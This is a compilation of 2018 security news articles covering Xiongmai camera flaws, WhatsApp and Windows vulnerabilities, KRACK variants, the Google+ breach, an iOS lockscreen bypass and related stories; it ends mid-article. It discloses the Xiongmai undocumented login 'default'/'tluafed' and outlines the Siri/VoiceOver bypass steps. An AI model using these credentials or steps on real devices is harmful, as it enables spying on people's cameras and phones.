Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”


Millions of Xiongmai video surveillance devices can be easily hacked via cloud feature
10.10.2018 securityaffairs
Privacy

Millions of Xiongmai video surveillance devices can be easily hacked via cloud feature, a gift for APT groups and cyber crime syndicates
Security experts from security firm SEC Consult have identified over 100 companies that buy and re-brand video surveillance equipment (surveillance cameras, digital video recorders (DVRs), and network video recorders (NVRs)) manufactured by the Chinese firm Hangzhou Xiongmai Technology Co., Ltd.(Xiongmai hereinafter) that are open to hack.


Millions of devices are affected by security vulnerabilities that can be easily exploited by a remote attacker to take over devices. The flaws could be exploited to spy on camera feeds of unaware users.

The flaws reside in a feature named the “XMEye P2P Cloud” that is enabled by default which is used to connect surveillance devices to the cloud infrastructure.

“From a usability perspective, this makes it easier for users to interact with the device, since the user does not have to be in the same network (e.g. the same Wi-Fi network) in order to connect to the device. Additionally, no firewall rules, port forwarding rules, or DDNS setup are required on the router, which makes this option convenient also for non-tech-savvy users.” reads the report published by SEC Consult.!However, this approach has several security implications:

The cloud server provider gets all the data (e.g. video streams that are viewed). Open questions:
Who runs these servers?
Who controls these servers? Where are they located?
Do they comply with local jurisdiction?
Does the service comply with EU GDPR?
If the data connection is not properly encrypted (spoiler alert: it’s not, we’ve checked!), anyone who can intercept the connection is able to monitor all data that is exchanged.
The “P2P Cloud” feature bypasses firewalls and effectively allows remote connections into private networks. Now, attackers cannot only attack devices that have been intentionally/unintentionally exposed to the web (classic “Shodan hacking” or the Mirai approach), but a large number of devices that are exposed via the “P2P Cloud”.”
Each device has a unique ID, called cloud ID or UID (i.e. 68ab8124db83c8db) that allows users to connect to a specific device through one of the supported apps.

Unfortunately, the cloud ID is not sufficiently random and complex to make guessing correct cloud IDs hard because the analysis of the Xiongmai firmware revealed it is derived from the device’s MAC address.

According to SEC Consult experts, an attacker can guess account IDs and access the feed associated with other IDs,

Experts found many other security issues, for example, all new XMEye accounts use a default admin username of “admin” with no password and the worst aspect is that the installation process doesn’t require users to change it.

The experts also discovered an undocumented user with the name “default” and password “tluafed.”

“In addition to the admin user, by default there is an undocumented user with the name “default”. The password of this user is “tluafed” (default in reverse).” continues the analysis.

“We have verified that this user can be used to log in to a device via the XMEye cloud (checked via custom client using the Xiongmai NetSDK). This user seems to at least have permissions to access/view video streams.”

Experts also discovered that it is possible to execute arbitrary code on the device through a firmware update.

Firmware updates are not signed, this means that an attacker carries out a MITM attack and impersonate the XMEye cloud to tainted firmware version.

Xiongmai devices were involved in IoT botnets in the last months, both Mirai and Satori bots infected a huge number of devices manufactured by the Chinese firm.

“We have worked together with ICS-CERT to address this issue since March 2018. ICS-CERT made great efforts to get in touch with Xiongmai and the Chinese CNCERT/CC and inform them about the issues. Although Xiongmai had seven months’ notice, they have not fixed any of the issues.”

“The conversation with them over the past months has shown that security is just not a priority to them at all.” concludes SEC Consult.


Hackers can compromise your WhatsApp account by tricking you into answering a video call
10.10.2018 securityaffairs
Hacking

Hackers can compromise your WhatsApp account by tricking you into answering a video call, the company fixed the flaw in September.
WhatsApp has addressed a vulnerability in the mobile applications that could have been exploited by attackers to crash victims instant messaging app simply by placing a call.

The vulnerability is a memory heap overflow issue that was discovered by Google Project Zero white hat hacker Natalie Silvanovich in August.

Natalie Silvanovich
@natashenka
Memory corruption bug in WhatsApp's non-WebRTC video conferencing implementation https://bugs.chromium.org/p/project-zero/issues/detail?id=1654 …

8:47 PM - Oct 9, 2018
560
305 people are talking about this
Twitter Ads info and privacy
Whatsapp has fixed the flaw on September 28 and Silvanovich published the technical details of the vulnerability.

The news of the flaw was also shared by popular Google researcher and bug hunter Tavis Ormandy.

Tavis Ormandy

@taviso
This is a big deal. Just answering a call from an attacker could completely compromise WhatsApp.

Natalie Silvanovich
@natashenka
Memory corruption bug in WhatsApp's non-WebRTC video conferencing implementation https://bugs.chromium.org/p/project-zero/issues/detail?id=1654 …

8:52 PM - Oct 9, 2018
444
338 people are talking about this
Twitter Ads info and privacy
The exploitation of the flaw was very trivial, a malformed RTP (Real-time Transport Protocol) packet sent to a user, a call request, could have been used to trigger the memory heap overflow and cause the crash of the application.

“This issue can occur when a WhatsApp user accepts a call from a malicious peer. It affects both the Android and iPhone clients.” reads the report published by Silvanovich.

WhatsApp

An attacker could completely hijack a target’s WhatsApp account and spy on its conversations by simply video calling it.

Silvanovich published the proof-of-concept in the security advisory.

Latest versions of both popular instant messaging app for both Android and iOS include the fix for this vulnerability.


Microsoft Patches Windows Zero-Day Exploited by 'FruityArmor' Group
10.10.2018 securityweek
Vulnerebility

Microsoft's Patch Tuesday updates for October 2018 resolve nearly 50 vulnerabilities, including a Windows zero-day flaw exploited by an advanced persistent threat (APT) actor known as FruityArmor.

The zero-day, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. The company says an authenticated attacker can exploit the security hole to elevate privileges and take control of the affected system.

According to Microsoft, the vulnerability has been actively exploited against older versions of Windows, but exploitation may also be possible on the latest versions of the operating system.

The flaw was reported to Microsoft by Kaspersky Lab, whose experts noticed the attacks exploiting CVE-2018-8453. Kaspersky will publish a detailed technical report on Wednesday, but the company told SecurityWeek that the vulnerability has been exploited by the FruityArmor group in a highly targeted campaign.

Interestingly, Microsoft's Patch Tuesday updates for October 2016 also addressed a Windows zero-day exploited by FruityArmor. That attack was also first observed by Kaspersky Lab.

Microsoft's latest updates also fix three vulnerabilities that were publicly disclosed before patches were made available, including a JET Database Engine issue for which an unofficial patch was released by 0patch.

The other disclosed flaws are a privilege escalation bug affecting the Windows kernel, and a remote code execution weakness impacting Azure IoT.

A dozen of the vulnerabilities addressed this month are critical. They impact Internet Explorer, Edge, Hyper-V, and XML Core Services.

One of the patches addresses CVE-2010-2190. This vulnerability was first resolved in 2010, but Exchange Server was not identified as one of the affected products at the time.

"This vulnerability affects all installations of Exchange Server. If you are running any version of Exchange server released prior to Exchange Server 2016 Cumulative Update 11 (as of this publishing, Cumulative Update 10 is the most recent cumulative update for Exchange 2016), the Visual Studio 2010 updates in MS11-025 should be applied to your Exchange Server," Microsoft explained in its advisory.

The remaining vulnerabilities have been classified as "important" – and a couple as "moderate" and "low" – and they impact Windows, SharePoint, Office, Edge, and SQL Server Management Studio.

"There was a total of 49 CVEs addressed across the portfolio," commented Chris Goettl, director of product management and security for Ivanti. "As expected, the majority, 33 were fixed in Windows 10, Edge, and the associated Server versions. Also, please note that there was an update for Server 2019 which was made generally available last week. Microsoft continued the trend from last month where they introduced both a monthly rollup and a security-only release for Server 2008. Prior to that there was only a single security update. Updates were released for all supported versions of Exchange Server and Sharepoint Server this month as well."


Apple Tells Congress Chinese Spy Chip Story Is False
10.10.2018 securityweek
Apple

The recent Bloomberg story claiming that Chinese spy chips made it into servers sold by California-based Super Micro is "simply wrong," Apple said in a letter sent on Monday to Congress.

The tech giant has denied claims that its servers were compromised and noted that its internal investigations have not found any evidence to support the Bloomberg report. The company also pointed out that some of the allegations from the article are based on a single anonymous source.

"While the story was being reported, we spoke with Bloomberg’s reporters and editors and answered any and all of their questions. We methodically dispelled the often-shifting nature of their claims. While we repeatedly asked them to share specific details about the alleged malicious chips that they seemed certain existed, they were unwilling or unable to provide anything more than vague secondhand accounts," wrote George Stathakopoulos, Apple's VP for information security.

"We were struck by the fact that the gravity and magnitude of the claims seemed to be undermined by their uncertainty around key details. Nevertheless, we worked tirelessly to ascertain whether these claims were true or, failing that, if anything even like them were true," he added.

Apple has denied finding any malicious chips or hardware manipulations, or contacting the FBI regarding such concerns, as claimed by Bloomberg.

The article describing the Chinese spy chips said the compromised devices were making outbound connections, and Apple is confident that its security systems would have detected this type of traffic.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations, including government agencies and tech giants such as Apple and Amazon.

The report, based on information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.

Amazon and Super Micro have also strongly denied the claims, and their statements have been backed up by security agencies in the United States and the United Kingdom.

While some experts believe the attack described by Bloomberg is technically possible, others, including one of the people cited in the controversial article, have raised doubts.


Researchers KRACK Wi-Fi Again, More Efficiently This Time
10.10.2018 securityweek
Attack

Researchers who last year discovered security issues in the Wi-Fi Protected Access II (WPA2) protocol that made them vulnerable to an attack known as Key Reinstallation Attack, or KRACK, have just revealed more practical versions of the attacks.

KRACK, Mathy Vanhoef and Frank Piessens explained last year, could provide malicious actors within range of a victim with the ability to access information otherwise believed to be safely encrypted. Residing in the Wi-Fi standard itself, the bugs impact all implementations, including Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others.

Targeting several handshakes in the 802.11 standard, the KRACKs manipulate handshake messages to reinstall an already-in-use key, which results in nonce reuse and replay attacks, Vanhoef and Piessens explained last year.

In a new research paper (PDF) to be presented at the Computer and Communications Security (CCS) conference this month, the researchers detail improved KRACK variants and show how the countermeasures deployed last year can be bypassed.

Generalized against the 4-way handshake, the new attacks no longer rely on hard-to-win race conditions and employ a more practical method to obtain a man-in-the-middle (MitM) position.

The researchers also reveal that the Fast Initial Link Setup (FILS) – which is not yet deployed in practice – and Tunneled direct-link setup PeerKey (TPK) handshakes are also vulnerable to key reinstallations and that the Wireless Network Management (WNM) power-save features can be abused to trigger reinstallations of the group key.

“Moreover, we bypass (and improve) the official countermeasure of 802.11. In particular, group key reinstallations were still possible by combining EAPOL-Key and WNM-Sleep frames. We also found implementation-specific flaws that facilitate key reinstallations,” the two researchers note.

Unlike the original attack, which relied on hard-to-win race conditions to trigger the key reinstallation, the new KRACK abuses power-save functionality of 802.11 to make the access point (AP) temporarily buffer a retransmitted message 3. The AP then sends retransmissions of message 3 encrypted under the newly negotiated session key.

“This encrypted message 3 will always be accepted by the client, even if it already installed the PTK. For example, unpatched versions of Android, macOS, and OpenBSD all accept the encrypted retransmitted message 3, and subsequently reinstall the session key,” the paper reads.

A multi-channel MitM position is required to perform a KRACK attack, which now the researchers say can be achieved by forging Channel Switch Announcements (CSAs) to trick clients into switching to the desired (rouge) channel. Previously, special equipment to jam certain channels was being employed, but the new method was successfully tested against Android and Chromium.

The researchers also discovered that it is possible to delay the delivery of message 3 after it has been captured (thus no longer triggering the key reinstallation immediately). Thus, more frames are sent before the attack occurs, meaning increasing the impact. The delay was successfully tested on Linux, Android, iOS, and macOS, and is also possible for encrypted messages.

“Our results show that preventing key reinstallations is harder than initially assumed. We believe the main reason vulnerabilities are still present is because the Wi-Fi standard is large, is continually being expanded with new features, and requires domain-specific knowledge to understand,” the researchers say.

“These obstacles can be overcome by having high-level descriptions (or formal models) of all security-related features of Wi-Fi. Additionally, we believe the Wi-Fi Alliance should not only test products for interoperability, but also fuzz them for vulnerabilities,” they also note.


KnowBe4 Brings Artificial Intelligence to Security Awareness Training
10.10.2018 securityweek
Security

It seems that you cannot have a new security product without a machine learning component. It makes sense. Machine learning recognizes patterns and returns probabilities. Risk, and cyber security is all about risk, is also about patterns and probabilities. Binary security is beginning to look a bit old.

Now machine learning has entered security awareness training. Security awareness training firm KnowBe4 has added a Virtual Risk Officer (VRO), a Virtual Risk Score (VRS), and Advanced Reporting (AR) features to its security awareness training and simulated phishing platform.

"We've integrated a deep learning neural network that evaluates how risk changes over time within an organization," explains Stu Sjouwerman, CEO of KnowBe4, "which helps cybersecurity professionals measure how their security awareness program performs."

Traditional simulated phishing tells organizations which of its employees are deceived by a simulated phish, and which ones recognized it. On its own, it gives no real measure on the probability of the employees falling for a future -- perhaps malicious -- phish.

This is the purpose of the VRO and the VRS. The VRO helps the security team to identify risk at the user, group or organizational level. This makes future awareness training plans more relevant. The VRS highlights which groups are particularly vulnerable to social engineering attacks -- again allowing the security team to more finely focus its training.

Machine learning works by analyzing data and detecting patterns that would normally be missed by human analysts. KnowBe4's approach is to draw the raw data from five categories. These are breach history (has the user been exposed in a prior breach made publicly known); extent of training; the state of their 'phish-prone percentage' (which is a KnowBe4 measure of the user's fail points); the level of risk for their operational group (for example, working in finance would be a high risk level); and a booster feature that allows the security team to adjust for known risk factors.

Sjouwerman told SecurityWeek how this works. "Each user will have a Personal Risk Score. The risk score for an organization's groups and an organization is a calculation based on the Personal Risk Scores of all of the members of that group or organization."

That personal risk score, he continued, "is calculated by several different factors including how likely the user is to be targeted with a phishing or social engineering attack, how they will react to these types of events, and how severe the consequences would be if they fell for an attack."

For example, the Personal Risk Score of employees in an Accounting Department will be higher than those of employees in the Graphic Design Department, because an Accounting Department has access to sensitive financial data. "Similarly," he added, "a CEO or CFO will have a higher risk score than a Marketing Director, because the C-level executives may have access to classified or proprietary information about the organization."

The effect of KnowBe4's neural network is to bring together all of these different factors into a single metric: the virtual risk score that is based on more than just the user's phishing and training performance. The process is rounded off by KnowBe4's new Advanced Reporting feature. This, says the company, gives access to more than 60 built-in reports with insights that give a holistic view of the entire organization over time. Each report, which is now available immediately, gives visibility into the organization's security awareness performance based on trainings taken and simulated phishing data.

"Before AR and VRO," explains Sjouwerman, "the admin could see Phish-prone percentage and training but could not correlate those two items. AR allows the correlation and VRO takes that to the next level by also incorporating additional data such as user exposure and role within the organization."

Clearwater, FL-based KnowBe4 was founded by Stu Sjouwerman in 2010. It raised $30 million in Series B financing led by Goldman Sachs Growth Equity (GS Growth) in October 2017; bringing the total funding to date to $44 million.


Google Launch Event Overshadowed by Privacy Firestorm
10.10.2018 securityweek
Privacy

Google was supposed to be focusing Tuesday on its launch of a new smartphone and other devices, but the event was being overshadowed by a firestorm over a privacy glitch that forced it to shut down its struggling social network.

The Silicon Valley giant said Monday it found and fixed a bug exposing private data in as many as 500,000 accounts, but drew fire for failing to disclose the incident.

The revelation heightened concerns in Washington over privacy practices by Silicon Valley giants after a series of missteps by Facebook that could have leaked data on millions.

"In the last year, we've seen Google try to evade scrutiny -- both for its business practices and its treatment of user data," Senator Mark Warner said in a statement.

Warner said that despite "consent" agreements with the US Federal Trade Commission "neither company appears to have been particularly chastened in their privacy practices" and added that "it's clear that Congress needs to step in" for privacy protections.

Marc Rotenberg, president of the Electronic Privacy Information Center, said the latest breach suggests the FTC has failed to do its job in protecting user data.

"The Congress needs to establish a data protection agency in the United States," Rotenberg said. "Data breaches are increasing but the FTC lacks the political will to enforce its own legal judgments."

Rising tensions

The internet search leader had already faced tensions with lawmakers after it decided against sending its top executive to testify at a hearing on privacy and data protection, prompting the committee to leave an empty seat for the company.

Last month, Google indicated it would send chief executive Sundar Pichai to testify before Congress.

Google has also been in the crosshairs of President Donald Trump, who alleged that its search results were biased against conservatives, although there was little evidence to support the claim.

The rising tensions come with Google holding an event in New York widely expected to release its Pixel 3, the upgraded premium smartphone that aims to compete with high-end devices from Apple and Samsung.

The Pixel phone is part of a suite of hardware products Google is releasing as part of an effort to keep consumers in its mobile ecosystem and challenge rivals like Apple and Amazon.

On Monday, Google said it was unable to confirm which accounts were affected by the bug, but an analysis indicated it could have been as many as 500,000 Google+ accounts.

Google did not specify how long the software flaw existed, or why it waited to disclose it.

The Wall Street Journal reported that Google executives opted against notifying users earlier because of concerns it would catch the attention of regulators and draw comparisons to a data privacy scandal at Facebook.

Earlier this year, Facebook acknowledged that tens of millions of users had personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

Google has also faced increasing tensions over a reported search engine which would be acceptable to Chinese censors, and over its work for the US military.

On Tuesday, Google confirmed it is dropping out of the bidding for a huge Pentagon cloud computing contract that could be worth up to $10 billion, saying the deal would be inconsistent with its principles.


Apple Patches Passcode Bypass in iOS
10.10.2018 securityweek
Apple

Apple on Monday released patches for iOS devices to address a recently disclosed vulnerability that could result in the bypass of the lockscreen.

The issue was found by iPhone enthusiast Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” who revealed several other passcode bypass techniques in the past.

Exploitation requires both physical access to the device and for Siri to be enabled and Face ID to be disabled.

Once these conditions are met, an attacker can ask Siri to enable the VoiceOver accessibility feature that helps visually impaired individuals to use their Apple device by having the content of the screen and selected buttons read out to them.

The attacker can then call the locked device so that the “Messages” icon appears on the screen, to trigger a notification, and then bring up a white page with hidden buttons and functions. By abusing VoiceOver to cycle through the functions, the attacker can then access contacts and photos stored on the device.

The Cupertino-based tech giant has released iOS 12.0.1 to address the issue, which is actually the result of two vulnerabilities in the operating system.

Tracked as CVE-2018-4380, the first bug impacts VoiceOver. “A lock screen issue allowed access to photos and contacts on a locked device,” Apple notes in its advisory.

The second flaw, CVE-2018-4379, affects Quick Look: “A lock screen issue allowed access to the share function on a locked device,” Apple says.

Thus, the new platform update includes two patches, both available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation. To address the vulnerabilities, the patches restrict the options offered on a locked device.

Also on Monday, Apple released iCloud for Windows 7.7 to address 19 vulnerabilities in Webkit, including memory corruptions, arbitrary code execution, unexepected cross-origin behavior, script execution, and an ASSERT failure. The update is available for Windows 7 and later.


New Pentagon Weapons Systems Easily Hacked: Report
10.10.2018 securityweek
BigBrothers

New US weapons systems being developed by the US Department of Defense can be easily be hacked by adversaries, a new government report said on Tuesday.

The Government Accountability Office said the Pentagon was unaware of how easy it could be for an adversary to gain access to the computer brains and software of the weapons systems and operate inside them undetected.

The weak points began with poor password management and unencrypted communications, it said.

But it said access points for the systems continued to grow in number and are not always well-understood by the operators themselves, leaving even non-networked systems deeply vulnerable.

More critically, the report faulted the US military for not incorporating cybersecurity into the design and acquisition process for the computer-dependent weapons, and said weapons developers often did not themselves adequately understand cybersecurity issues.

"Due to this lack of focus on weapon systems cybersecurity, DOD likely has an entire generation of systems that were designed and built without adequately considering cybersecurity," the GAO said.

"In one case, it took a two-person test team just one hour to gain initial access to a weapon system and one day to gain full control of the system they were testing," it said.

In another case, it said, the test team gained control of the terminals of the system's operators.

"They could see, in real-time, what the operators were seeing on their screens and could manipulate the system."

The public, unclassified version of the report did not identify which arms systems it had tested and found faults with, citing the need for secrecy.

But it said that between 2012 and 2017, the Defense Department's own testers "routinely" found dangerous cyber vulnerabilities in "nearly all" weapons systems under development.

"Using relatively simple tools and techniques, testers were able to take control of these systems and largely operate undetected. In some cases, system operators were unable to effectively respond to the hacks," it said.

The risk rises as Pentagon weapons and other systems are increasingly interconnected and their dependence on software and networking continues to rise.

The report came as the US government wrestles with what it sees as concerted efforts by government-backed hackers in Russia and China to permeate government and private sector computer networks to steal data or simply wreak havoc.


No Security Fixes in Patch Tuesday Updates for Flash Player
10.10.2018 securityweek
Vulnerebility

The Patch Tuesday updates released this month by Adobe for Flash Player include no security fixes. The company did address several vulnerabilities in some of its other products.

Adobe informed customers that Digital Editions for Windows, Mac and iOS is impacted by nine vulnerabilities, including four critical memory-related bugs that can be exploited for arbitrary code execution. The remaining flaws have been rated "important" and they can result in information disclosure.

All the Digital Editions flaws were reported to Adobe by Jaanus Kääp of Clarified Security.

Kushal Arvind Shah of Fortinet’s Fortiguard Labs informed Adobe of DLL hijacking vulnerabilities that allow privilege escalation in the Technical Communications Suite and the Framemaker application. Both security holes have been rated "important."

In Experience Manager, Adobe patched several stored and reflected cross-site scripting (XSS) vulnerabilities that can result in the disclosure of sensitive information.

While no security fixes have been rolled out on Tuesday for Flash Player, that does not mean the application is 100% secure. In October 2017, Adobe released no Patch Tuesday updates, but one week later it issued an emergency fix for Flash Player to resolve a zero-day vulnerability that had been exploited in targeted attacks by a Middle Eastern threat actor.

The number of vulnerabilities found by researchers in Flash Player has decreased significantly after Adobe announced its intention to kill the application by 2020, but malicious actors are still looking for flaws they can exploit in their operations. A zero-day was exploited by hackers as recently as June.


Google Tightens Rules Around App Permissions
10.10.2018 securityweek
Incindent

Google this week announced improved user control over data shared with apps, redesigned app permissions, and diminished app access to sensitive information such as contacts, SMS, and phone.

The changes, the search giant says, are being rolled out as part of Project Strobe, which represents an overall review of third-party developer access to Google account and Android device data. The idea was to have a look at privacy controls, data privacy concerns, and the access developers enjoy, and make adjustments where necessary.

The first and most important change resulting from Project Strobe is the shutdown of Google+ for consumers in August 2019. It is not surprising, given the low usage and engagement the social platform sees at the moment, with 90% of Google+ user sessions lasting less than five seconds.

While reviewing Google+ APIs, Google discovered a bug in one of the APIs, where apps would gain access to user’s profile fields that were not made public.

Such data includes optional Google+ Profile fields such as name, email address, occupation, gender and age, but does not include Google+ posts, messages, Google account data, phone numbers, or G Suite content. The flawed API was apparently used by up to 438 applications and the bug was fixed in March.

“We made Google+ with privacy in mind and therefore keep this API’s log data for only two weeks. That means we cannot confirm which users were impacted by this bug. However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected,” Google says.

The company also claims that it has no evidence of developers being aware of the security flaw in said API. There is no evidence of profile data being misused either, the Internet giant notes.

“The review did highlight the significant challenges in creating and maintaining a successful Google+ that meets consumers’ expectations. Given these challenges and the very low usage of the consumer version of Google+, we decided to sunset the consumer version of Google+,” Google points out.

Another result of Project Strobe is the rolling-out of an improvement to Google’s API infrastructure, which starts with separately showing each and every permission that an app requests. Basically, each permission will get its own dialogue, so that users can allow or deny them individually.

Thus, developers are advised to review the Google API Services: User Data Policy, check the permissions the user has granted to their apps, request permissions only when they are needed, and provide justification before asking for access.

The changes, Google reveals, will start rolling out this month and will get extended to existing clients at the beginning of 2019. The Internet giant expects the move to increase transparency and trust in its app ecosystem.

Google is also updating its User Data Policy for the consumer Gmail API to limit the apps that may seek permission to access consumer Gmail data. Thus, only email clients, email backup services, and productivity services will be authorized to access this data.

These apps will also need to agree to new rules on handling Gmail data and will also be subject to security assessments, the company says. Set to go into effect on January 9, 2019, the new policies target how data must not be used, how it should be secured, and what data can be accessed.

“All apps accessing the Covered Gmail APIs will be required to submit an application review starting on January 9, 2019. If a review is not submitted by February 15, 2019, then new grants from Google consumer accounts will be disabled after February 22, 2019 and any existing grants will be revoked after March 31, 2019,” Google says.

The search giant is also limiting apps’ ability to receive call log and SMS permissions on Android devices, so that only the apps that have been set as the default apps for making calls or text messages could make these requests. Furthermore, contact interaction data is no longer available via the Android Contacts API, the company explains.

“Our goal is to support a wide range of useful apps, while ensuring that everyone is confident that their data is secure. By giving developers more explicit rules of the road, and helping users control your data, we can ensure that we keep doing just that,” Google concludes.


Researchers presented an improved version of the WPA KRACK attack
10.10.2018 securityaffairs
Attack 

Security researchers who devised last year the Key Reinstallation Attack, aka KRACK attack, have disclosed new variants of the attack.
Security researchers Mathy Vanhoef and Frank Piessens who devised last year the Key Reinstallation Attack against WPA, aka KRACK attack, have disclosed new variants of the attack.

Last year, boffins discovered several key management flaws in the core of Wi-Fi Protected Access II (WPA2) protocol that could be exploited by an attacker to hack into Wi-Fi network and eavesdrop on the Internet communications stealing sensitive information (i.e. credit card numbers, passwords, chat messages, emails, and pictures).

WPA2 was compromised, the flaws, in fact, reside in the Wi-Fi standard itself, and not in the numerous implementations.

he KRACK attack allows attackers to decrypt WiFi users’ data without cracking or knowing the password.

According to the researchers, the KRACK attack works against:

Both WPA1 and WPA2,
Personal and enterprise networks,
Ciphers WPA-TKIP, AES-CCMP, and GCMP
The bugs impact all implementations, including Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others.

Now the experts presented a new variant of the attack technique at the Computer and Communications Security (CCS) conference

The new attacks no longer rely on hard-to-win race conditions and involved a new method to carry out man-in-the-middle (MitM) attacks.

“First, we generalize attacks against the 4-way handshake so they no longer rely on hard-to-win race conditions, and we employ a more practical method to obtain the required man-in-the-middle (MitM) position.” reads the research paper.

“Second, we systematically investigate the 802.11 standard for key reinstallation vulnerabilities, and show that the Fast Initial Link Setup (FILS) and Tunneled directlink setup PeerKey (TPK) handshakes are also vulnerable to key reinstallations. These handshakes increase roaming speed, and enable direct connectivity between clients, respectively. Third, we abuse Wireless Network Management (WNM) power-save features to trigger reinstallations of the group key”

KRACK attack 2

Experts explained that they achieved the multi-channel MitM position by forging Channel Switch Announcements (CSAs) to trick clients into switching to the desired (rouge) channel.

“We propose a more practical method to obtain the MitM, which works based on Channel Switch Announcements (CSAs). In this method, the adversary forges CSAs to trick clients into switching to the desired (rouge) channel [27, 46].” continues the paper. “This is more reliable then jamming certain channels, and does not require special Wi-Fi equipment. We successfully tested this approach against Android and Chromium”

The security duo also discovered that it is possible to delay the delivery of message 3, which transports the group key to the client after it has been captured. In this way, the key reinstallation will no be immediately triggered allowing to the delay the attack and increasing the potential impact.

Experts successfully tested the delay on Linux, Android, iOS, and macOS, and is also works with encrypted messages.

“Our results show that preventing key reinstallations is harder than initially assumed. We believe the main reason vulnerabilities are still present is because the Wi-Fi standard is large, is continually being expanded with new features, and requires domain-specific knowledge to understand,” the researchers conclude.

“These obstacles can be overcome by having high-level descriptions (or formal models) of all security-related features of Wi-Fi. Additionally, we believe the Wi-Fi Alliance should not only test products for interoperability, but also fuzz them for vulnerabilities,”


Project Strobe, what will change after the Google security breach?
10.10.2018 securityaffairs
Incindent

Google announced a security breach that may have exposed data of over 500,000 users of its Google+ social network, these are the measures in response to the incident.
Yesterday Google announced a security breach that may have exposed data of over 500,000 users of its Google+ social network.

Security experts and privacy advocated criticized the company because it did not disclose the flaw in the Google+ when it first discovered the issue in March because it feared regulatory scrutiny and reputational damage.

.Now the company in order to prevent potential leakage of sensitive data to third-party app developers implemented significant changes to give users a granular control over the data they allow to share with each app.

Google has updated its Account Permissions system in order to allow users to grant individual permission rather than grant a full set of permissions at once.

Google project-strobe privacy

The company introduced several changes as a result of the work of its internal group Project Strobe, an internal task force charged of conducting a companywide audit of the company’s APIs in recent months.

The team reviewed the third-party developers access to Google account and Android device data, the IT giant has changed the way permissions are approved for Android apps to prevent the abuse and potential leakage of sensitive call and text log data by third-party developers.

While the apps are only supposed to request permission those are required for functioning properly, any Android app can ask permission to access your phone and SMS data unnecessarily.

The new rule is part of the Google Play Developer Policy and aims to prevent the abuse of Call Log and SMS permission usage to your “default” phone or SMS apps only.

“Some Android apps ask for permission to access a user’s phone (including call logs) and SMS data. Going forward, Google Play will limit which apps are allowed to ask for these permissions.” reads a blog post published by Google on the Project Strobe.

“Only an app that you’ve selected as your default app for making calls or text messages will be able to make these requests. (There are some exceptions—e.g., voicemail and backup apps.),”

Google has also limited access to Gmail API only for apps expressly developed to improve/implement email features, including email clients and email backup services.

The measure aims at limiting APIs access to data from your Gmail email account.

What will happen from today?

The developers will have to update their application in compliance with the new policy within January 6th, 90 days from now.


Google Says Social Network Bug Exposed Private Data
9.10.2018 securityweek
Social

Google announced Monday it is shutting down the consumer version of its online social network after fixing a bug exposing private data in as many as 500,000 accounts.

The US internet giant said it will "sunset" the Google+ social network for consumers, which failed to gain meaningful traction after being launched in 2011 as a challenge to Facebook.

A Google spokesperson cited "significant challenges in creating and maintaining a successful Google+ that meets consumers' expectations" along with "very low usage" as the reasons for the move.

In March, a security audit revealed a software bug that gave third-party apps access to Google+ private profile data that people meant to share only with friends.

Google said it was unable to confirm which accounts were affected by the bug, but an analysis indicated it could have been as many as 500,000 Google+ accounts.

"We found no evidence that any developer was aware of this bug, or abusing the API, and we found no evidence that any profile data was misused," Google said in a blog post.

It was referring to application programming interface software for the social network.

The data involved was limited to optional profile fields, including name, age, gender, occupation and email address, Google said.

Information that could be accessed did not include posts, messages or telephone numbers, a spokesperson said.

Google did not specify how long the software flaw existed, or why it waited to disclose it.

The Wall Street Journal reported that Google executives opted against notifying users earlier because of concerns it would catch the attention of regulators and draw comparisons to a data privacy scandal at Facebook.

Earlier this year, Facebook acknowledged that tens of millions of users had personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"Every year, we send millions of notifications to users about privacy and security bugs and issues," a Google spokesman told AFP.

"Whenever user data may have been affected, we go beyond our legal requirements and apply several criteria focused on our users in determining whether to provide notice."

The company said it determined its course of action based on the data involved in the breach, lack of evidence of misuse and whether it could accurately determine which users to inform.


California to Ban Weak Passwords
9.10.2018 securityweek
Incindent

California Bill Requires Unique Passwords in Connected Devices

The state of California recently passed a bill that requires the manufacturers of connected devices to use unique hardcoded passwords for each device manufactured.

